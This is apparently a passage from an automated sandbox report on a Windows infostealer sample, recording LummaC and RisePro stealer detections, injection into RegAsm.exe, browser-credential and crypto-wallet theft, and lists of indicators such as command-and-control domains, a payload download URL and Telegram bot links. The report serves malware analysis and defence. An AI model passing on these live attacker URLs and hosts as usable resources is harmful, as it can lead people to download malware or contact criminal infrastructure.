                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPS
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: number of queries: 2357
                  Source: Yara matchFile source: 00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1939197101.000000000071D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1740, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5856, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2128, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5948, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1740, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2128, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Yara detected RisePro Stealer
                  Source: Yara matchFile source: 00000000.00000003.1824382503.0000000005E26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\uw5Stgma3gbM9Xo4g_6cCoQ.zip, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		2
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts11
                  Native API                  		1
                  Scheduled Task/Job                  		411
                  Process Injection                  		11
                  Deobfuscate/Decode Files or Information                  		LSASS Memory22
                  File and Directory Discovery                  		Remote Desktop Protocol31
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  Command and Scripting Interpreter                  		1
                  Registry Run Keys / Startup Folder                  		1
                  Scheduled Task/Job                  		4
                  Obfuscated Files or Information                  		Security Account Manager135
                  System Information Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  Scheduled Task/Job                  		Login Hook1
                  Registry Run Keys / Startup Folder                  		3
                  Software Packing                  		NTDS1
                  Query Registry                  		Distributed Component Object Model2
                  Clipboard Data                  		3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts1
                  PowerShell                  		Network Logon ScriptNetwork Logon Script1
                  Timestomp                  		LSA Secrets741
                  Security Software Discovery                  		SSHKeylogging114
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials11
                  Process Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading                  		DCSync351
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job351
                  Virtualization/Sandbox Evasion                  		Proc Filesystem1
                  System Network Configuration Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt411
                  Process Injection                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1429253 Sample: 2q45IEa3Ee.exe Startdate: 21/04/2024 Architecture: WINDOWS Score: 100 50 bordersoarmanusjuw.shop 2->50 52 ipinfo.io 2->52 54 db-ip.com 2->54 64 Snort IDS alert for network traffic 2->64 66 Multi AV Scanner detection for domain / URL 2->66 68 Found malware configuration 2->68 70 11 other signatures 2->70 8 2q45IEa3Ee.exe 1 77 2->8         started        13 MSIUpdaterV202.exe 1 2->13         started        15 AdobeUpdaterV202.exe 2->15         started        17 2 other processes 2->17 signatures3 process4 dnsIp5 58 193.233.132.253, 49732, 49740, 50500 FREE-NET-ASFREEnetEU Russian Federation 8->58 60 ipinfo.io 34.117.186.192, 443, 49733 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 8->60 62 db-ip.com 104.26.5.15, 443, 49734 CLOUDFLARENETUS United States 8->62 42 C:\Users\user\...\oRkIPIEeryat7GMgjkBr.exe, PE32 8->42 dropped 44 C:\Users\user\AppData\...\lumma1504[1].exe, PE32 8->44 dropped 46 C:\Users\user\...\AdobeUpdaterV202.exe, PE32 8->46 dropped 48 2 other malicious files 8->48 dropped 92 Query firmware table information (likely to detect VMs) 8->92 94 Tries to detect sandboxes and other dynamic analysis tools (window names) 8->94 96 Tries to steal Mail credentials (via file / registry access) 8->96 110 8 other signatures 8->110 19 oRkIPIEeryat7GMgjkBr.exe 1 8->19         started        22 schtasks.exe 1 8->22         started        24 schtasks.exe 1 8->24         started        98 Antivirus detection for dropped file 13->98 100 Multi AV Scanner detection for dropped file 13->100 102 Machine Learning detection for dropped file 13->102 26 RegAsm.exe 13->26         started        104 Writes to foreign memory regions 15->104 106 Allocates memory in foreign processes 15->106 108 Injects a PE file into a foreign processes 15->108 28 RegAsm.exe 15->28         started        30 RegAsm.exe 17->30         started        32 RegAsm.exe 17->32         started        file6 signatures7 process8 signatures9 72 Antivirus detection for dropped file 19->72 74 Multi AV Scanner detection for dropped file 19->74 76 Machine Learning detection for dropped file 19->76 84 5 other signatures 19->84 34 RegAsm.exe 19->34         started        38 conhost.exe 22->38         started        40 conhost.exe 24->40         started        78 Query firmware table information (likely to detect VMs) 30->78 80 Tries to harvest and steal browser information (history, passwords, etc) 30->80 82 Tries to steal Crypto Currency Wallets 30->82 process10 dnsIp11 56 bordersoarmanusjuw.shop 172.67.189.66, 443, 49742, 49743 CLOUDFLARENETUS United States 34->56 86 Query firmware table information (likely to detect VMs) 34->86 88 Found many strings related to Crypto-Wallets (likely being stolen) 34->88 90 Tries to steal Crypto Currency Wallets 34->90 signatures12

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  2q45IEa3Ee.exe24%VirustotalBrowse
                  2q45IEa3Ee.exe29%ReversingLabsWin32.Trojan.Generic

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe100%AviraTR/AD.Nekark.sbdpe
                  C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe100%AviraTR/AD.Nekark.sbdpe
                  C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe100%AviraTR/AD.Nekark.sbdpe
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exe100%AviraTR/AD.Nekark.sbdpe
                  C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exe100%Joe Sandbox ML
                  C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe92%ReversingLabsByteCode-MSIL.Spyware.Lummastealer
                  C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe77%VirustotalBrowse
                  C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe92%ReversingLabsByteCode-MSIL.Spyware.Lummastealer
                  C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe77%VirustotalBrowse
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exe92%ReversingLabsByteCode-MSIL.Spyware.Lummastealer
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exe77%VirustotalBrowse
                  C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe92%ReversingLabsByteCode-MSIL.Spyware.Lummastealer
                  C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe77%VirustotalBrowse

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  bordersoarmanusjuw.shop2%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://ocsp.sectigo.com00%URL Reputationsafe
                  https://sectigo.com/CPS00%URL Reputationsafe
                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                  bordersoarmanusjuw.shop2%VirustotalBrowse
                  https://bordersoarmanusjuw.shop:443/api16%VirustotalBrowse
                  https://bordersoarmanusjuw.shop/16%VirustotalBrowse
                  https://bordersoarmanusjuw.shop/api16%VirustotalBrowse
                  https://bordersoarmanusjuw.shop/api(9%VirustotalBrowse
                  https://bordersoarmanusjuw.shop/010%VirustotalBrowse
                  https://bordersoarmanusjuw.shop/#16%VirustotalBrowse
                  mealplayerpreceodsju.shop18%VirustotalBrowse
                  absentconvicsjawun.shop2%VirustotalBrowse
                  pushjellysingeywus.shop2%VirustotalBrowse
                  economicscreateojsu.shop13%VirustotalBrowse
                  https://bordersoarmanusjuw.shop/api$13%VirustotalBrowse
                  http://193.233.132.253/lumma1504.exe23%VirustotalBrowse
                  https://bordersoarmanusjuw.shop/apie15%VirustotalBrowse
                  https://bordersoarmanusjuw.shop/pi2%VirustotalBrowse
                  wifeplasterbakewis.shop2%VirustotalBrowse
                  https://bordersoarmanusjuw.shop/apir13%VirustotalBrowse
                  entitlementappwo.shop17%VirustotalBrowse
                  suitcaseacanehalk.shop2%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bordersoarmanusjuw.shop
                  		172.67.189.66
                  		truetrueunknown
                  ipinfo.io
                  		34.117.186.192
                  		truefalse
                    		high
                    db-ip.com
                    		104.26.5.15
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      bordersoarmanusjuw.shoptrueunknown
                      https://bordersoarmanusjuw.shop/apitrueunknown
                      mealplayerpreceodsju.shoptrueunknown
                      absentconvicsjawun.shoptrueunknown
                      http://193.233.132.253/lumma1504.exetrueunknown
                      pushjellysingeywus.shoptrueunknown
                      economicscreateojsu.shoptrueunknown
                      https://ipinfo.io/widget/demo/81.181.57.52false
                        		high
                        wifeplasterbakewis.shoptrueunknown
                        https://db-ip.com/demo/home.php?s=81.181.57.52false
                          		high
                          suitcaseacanehalk.shoptrueunknown
                          entitlementappwo.shoptrueunknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtab2q45IEa3Ee.exe, 00000000.00000003.1812931401.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1815262466.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1811745370.0000000005FC0000.00000004.00000020.00020000.00000000.sdmp, _TP0jqeyFqX_Web Data.0.dr, PGpLy2WBlLFSWeb Data.0.dr, y_CqgZq8h7seWeb Data.0.drfalse
                            		high
                            https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFD87fZN3R3jFeplaces.sqlite.0.drfalse
                              		high
                              https://bordersoarmanusjuw.shop/k9RegAsm.exe, 0000000F.00000002.2048327163.00000000014B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://duckduckgo.com/ac/?q=2q45IEa3Ee.exe, 00000000.00000003.1812931401.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1815262466.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1811745370.0000000005FC0000.00000004.00000020.00020000.00000000.sdmp, _TP0jqeyFqX_Web Data.0.dr, PGpLy2WBlLFSWeb Data.0.dr, y_CqgZq8h7seWeb Data.0.drfalse
                                  		high
                                  http://ocsp.sectigo.com02q45IEa3Ee.exefalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://bordersoarmanusjuw.shop/0RegAsm.exe, 00000011.00000002.2130384793.0000000001576000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                  https://db-ip.com/2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://bordersoarmanusjuw.shop:443/apiSIDRegAsm.exe, 0000000A.00000002.1936237566.0000000001580000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://bordersoarmanusjuw.shop:443/apiRegAsm.exe, 00000011.00000002.2130384793.000000000156B000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                      https://bordersoarmanusjuw.shop/SanRegAsm.exe, 00000011.00000002.2130384793.0000000001576000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=2q45IEa3Ee.exe, 00000000.00000003.1812931401.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1815262466.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1811745370.0000000005FC0000.00000004.00000020.00020000.00000000.sdmp, _TP0jqeyFqX_Web Data.0.dr, PGpLy2WBlLFSWeb Data.0.dr, y_CqgZq8h7seWeb Data.0.drfalse
                                          		high
                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e172q45IEa3Ee.exe, 00000000.00000003.1812141315.0000000005FBF000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1814756856.0000000005FDD000.00000004.00000020.00020000.00000000.sdmp, 4yAbYkouo2kFHistory.0.dr, SMhcoWrJBtJiHistory.0.drfalse
                                            		high
                                            https://bordersoarmanusjuw.shop/apiVYRegAsm.exe, 0000000A.00000002.1936237566.000000000162F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://ipinfo.io/Content-Type:2q45IEa3Ee.exe, 00000000.00000003.1627570903.00000000016F0000.00000004.00001000.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpfalse
                                                		high
                                                https://bordersoarmanusjuw.shop/XavfRegAsm.exe, 00000011.00000002.2130384793.00000000015C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://ipinfo.io/widget/demo/81.181.57.52/02q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://bordersoarmanusjuw.shop/es)RegAsm.exe, 0000000B.00000002.1939197101.00000000006DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://193.233.132.253/lumma1504.exedser2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://t.me/risepro_bot.52igY2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://bordersoarmanusjuw.shop/RegAsm.exe, RegAsm.exe, 0000000B.00000002.1939197101.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1939197101.000000000071D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2048327163.00000000014EC000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                          http://193.233.132.253/lumma1504.exesw2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://ipinfo.io:443/widget/demo/81.181.57.522q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://t.me/risepro_botrisepro8Y2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install4yAbYkouo2kFHistory.0.dr, SMhcoWrJBtJiHistory.0.drfalse
                                                                  		high
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search2q45IEa3Ee.exe, 00000000.00000003.1812931401.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1815262466.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1811745370.0000000005FC0000.00000004.00000020.00020000.00000000.sdmp, _TP0jqeyFqX_Web Data.0.dr, PGpLy2WBlLFSWeb Data.0.dr, y_CqgZq8h7seWeb Data.0.drfalse
                                                                    		high
                                                                    https://ipinfo.io/s2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://bordersoarmanusjuw.shop/api$RegAsm.exe, 00000007.00000002.1920835027.00000000014BD000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                                      https://bordersoarmanusjuw.shop/api(RegAsm.exe, 0000000A.00000002.1936237566.00000000015CF000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                                      https://bordersoarmanusjuw.shop/#RegAsm.exe, 0000000A.00000002.1936828284.00000000037E5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                                      https://bordersoarmanusjuw.shop/rxRegAsm.exe, 00000011.00000002.2130384793.0000000001576000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://db-ip.com:443/demo/home.php?s=81.181.57.522q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://sectigo.com/CPS02q45IEa3Ee.exefalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.ico2q45IEa3Ee.exe, 00000000.00000003.1812931401.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1815262466.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1811745370.0000000005FC0000.00000004.00000020.00020000.00000000.sdmp, _TP0jqeyFqX_Web Data.0.dr, PGpLy2WBlLFSWeb Data.0.dr, y_CqgZq8h7seWeb Data.0.drfalse
                                                                            		high
                                                                            https://bordersoarmanusjuw.shop/&YRegAsm.exe, 0000000A.00000002.1936237566.000000000162F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=2q45IEa3Ee.exe, 00000000.00000003.1812931401.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1815262466.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1811745370.0000000005FC0000.00000004.00000020.00020000.00000000.sdmp, _TP0jqeyFqX_Web Data.0.dr, PGpLy2WBlLFSWeb Data.0.dr, y_CqgZq8h7seWeb Data.0.drfalse
                                                                                		high
                                                                                https://t.me/RiseProSUPPORTuw5Stgma3gbM9Xo4g_6cCoQ.zip.0.drfalse
                                                                                  		high
                                                                                  https://bordersoarmanusjuw.shop/yRegAsm.exe, 0000000F.00000002.2048327163.00000000014EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://ipinfo.io/L2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20162q45IEa3Ee.exe, 00000000.00000003.1812141315.0000000005FBF000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1814756856.0000000005FDD000.00000004.00000020.00020000.00000000.sdmp, 4yAbYkouo2kFHistory.0.dr, SMhcoWrJBtJiHistory.0.drfalse
                                                                                        		high
                                                                                        https://bordersoarmanusjuw.shop/apiMRegAsm.exe, 00000011.00000002.2131175305.0000000003840000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://www.ecosia.org/newtab/2q45IEa3Ee.exe, 00000000.00000003.1812931401.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1815262466.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1811745370.0000000005FC0000.00000004.00000020.00020000.00000000.sdmp, _TP0jqeyFqX_Web Data.0.dr, PGpLy2WBlLFSWeb Data.0.dr, y_CqgZq8h7seWeb Data.0.drfalse
                                                                                            		high
                                                                                            https://ipinfo.io/Mozilla/5.02q45IEa3Ee.exe, 00000000.00000002.1877753884.0000000001767000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brD87fZN3R3jFeplaces.sqlite.0.drfalse
                                                                                                		high
                                                                                                https://ac.ecosia.org/autocomplete?q=2q45IEa3Ee.exe, 00000000.00000003.1812931401.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1815262466.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1811745370.0000000005FC0000.00000004.00000020.00020000.00000000.sdmp, _TP0jqeyFqX_Web Data.0.dr, PGpLy2WBlLFSWeb Data.0.dr, y_CqgZq8h7seWeb Data.0.drfalse
                                                                                                  		high
                                                                                                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t2q45IEa3Ee.exefalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://t.me/risepro_bot2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1821067278.0000000006026000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.0.drfalse
                                                                                                    		high
                                                                                                    https://ipinfo.io/2q45IEa3Ee.exe, 2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017AB000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000002.1877753884.0000000001767000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.maxmind.com/en/locate-my-ip-address2q45IEa3Ee.exe, 2q45IEa3Ee.exe, 00000000.00000003.1627570903.00000000016F0000.00000004.00001000.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                        		high
                                                                                                        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#2q45IEa3Ee.exefalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://bordersoarmanusjuw.shop/ORegAsm.exe, 00000011.00000002.2130384793.00000000015C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://bordersoarmanusjuw.shop/apieRegAsm.exe, 0000000B.00000002.1939197101.00000000006DA000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                                                                          https://bordersoarmanusjuw.shop/llRegAsm.exe, 00000011.00000002.2130384793.0000000001576000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://www.winimage.com/zLibDll2q45IEa3Ee.exe, 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                              		high
                                                                                                              https://support.mozilla.orgD87fZN3R3jFeplaces.sqlite.0.drfalse
                                                                                                                		high
                                                                                                                https://bordersoarmanusjuw.shop/piRegAsm.exe, 0000000B.00000002.1939197101.0000000000795000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples4yAbYkouo2kFHistory.0.dr, SMhcoWrJBtJiHistory.0.drfalse
                                                                                                                  		high
                                                                                                                  https://bordersoarmanusjuw.shop/piableRegAsm.exe, 00000007.00000002.1920616270.00000000013CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=2q45IEa3Ee.exe, 00000000.00000003.1812931401.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1815262466.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1811745370.0000000005FC0000.00000004.00000020.00020000.00000000.sdmp, _TP0jqeyFqX_Web Data.0.dr, PGpLy2WBlLFSWeb Data.0.dr, y_CqgZq8h7seWeb Data.0.drfalse
                                                                                                                      		high
                                                                                                                      https://bordersoarmanusjuw.shop/apirRegAsm.exe, 00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmpfalseunknown

                                                                                                                      World Map of Contacted IPs

                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs

                                                                                                                      Public IPs

                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      172.67.189.66
                                                                                                                      		bordersoarmanusjuw.shopUnited States
                                                                                                                      		13335CLOUDFLARENETUStrue
